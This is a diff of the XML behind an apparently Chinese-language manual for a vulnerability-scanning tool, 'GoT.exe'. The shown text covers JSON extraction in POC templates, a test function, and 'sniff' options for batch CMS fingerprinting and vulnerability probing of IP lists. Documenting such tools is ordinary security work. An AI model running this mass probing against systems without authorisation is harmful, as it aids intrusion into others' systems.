                       <a:fillRect/>
                     </a:stretch>
@@ -5259,24 +6006,31 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "body": ".</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>jsp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>",</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -5284,41 +6038,13 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>json</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>": "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>jsp:data</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
@@ -5330,25 +6056,16 @@
       </w:tr>
     </w:tbl>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>其中</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>的意思是</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>其中json的意思是</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5369,15 +6086,16 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>jsp</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5385,6 +6103,11 @@
             <w:tcW w:w="6458" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5402,6 +6125,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -5416,25 +6142,16 @@
             <w:tcW w:w="6458" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>要取的</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>json</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>数据，也就是取上面的</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>要取的json数据，也就是取上面的</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5455,12 +6172,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -5483,7 +6206,7 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -5525,6 +6248,11 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5538,6 +6266,11 @@
             <w:tcW w:w="6883" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5553,6 +6286,11 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5566,6 +6304,11 @@
             <w:tcW w:w="6883" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5576,12 +6319,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -5609,6 +6358,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5619,6 +6373,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -5650,22 +6405,24 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>输出header ,body ,</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>status_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>输出header ,body ,status_code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -5686,7 +6443,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5708,6 +6465,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -5728,7 +6490,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5750,6 +6512,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5760,6 +6527,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -5831,6 +6599,12 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -5851,7 +6625,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5876,7 +6650,7 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -5890,30 +6664,22 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>有时候咱们编写POC不知道高级函数变量的值是多少（也就是regex和</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>），不知道匹配的值是多少时，可以使用test函数进行测试</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>有时候咱们编写POC不知道高级函数变量的值是多少（也就是regex和json），不知道匹配的值是多少时，可以使用test函数进行测试</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -5965,6 +6731,12 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -5985,7 +6757,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6006,12 +6778,18 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -6046,6 +6824,11 @@
             <w:tcW w:w="2830" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6059,39 +6842,16 @@
             <w:tcW w:w="6521" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>寻找到</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>cms</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>随后根据</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>cms</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>验证漏洞</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>寻找到cms随后根据cms验证漏洞</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6102,6 +6862,11 @@
             <w:tcW w:w="2830" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6115,25 +6880,16 @@
             <w:tcW w:w="6521" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>批量验证</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>cms</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>和漏洞</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>批量验证cms和漏洞</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6144,11 +6900,16 @@
             <w:tcW w:w="2830" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>sniff -f ip.txt</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>sniff -f ip.txt -n</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6157,25 +6918,16 @@
             <w:tcW w:w="6521" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>不进行漏洞验证，只搜索域名和</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>ip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>信息</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>不进行漏洞验证和域名ip信息验证，只测试网站存活和cms信息</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6186,11 +6938,16 @@
             <w:tcW w:w="2830" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>sniff -f ip.txt -n</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>-export csv=文件名称</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6199,62 +6956,11 @@
             <w:tcW w:w="6521" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>不进行漏洞验证和域名</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>ip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>信息验证，只测试网站存活和</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>cms</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>信息</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="2830" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>-export csv=文件名称</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6521" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6265,12 +6971,227 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>3.2.1 打点漏洞探测</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">使用GoT.exe sniff </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ip.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -at</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -export csv=xxx 对资产进行漏洞探测，原理是先从指纹库识别指纹，随后通过指纹寻找指纹相关漏洞</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，随后输出到csv文件中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DEF1F66" wp14:editId="7D965965">
+            <wp:extent cx="4235743" cy="3400425"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="796154447" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="796154447" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4247914" cy="3410196"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>3.2.2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 指纹批量探测</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GoT.exe sniff </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ip.txt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>-n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -export csv=xxx 对ip.txt的ip进行指纹探测</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AAB636D" wp14:editId="4B9DFA56">
+            <wp:extent cx="5274310" cy="2454910"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
+            <wp:docPr id="637394293" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="637394293" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2454910"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -6281,21 +7202,12 @@
         </w:rPr>
         <w:t>四，</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
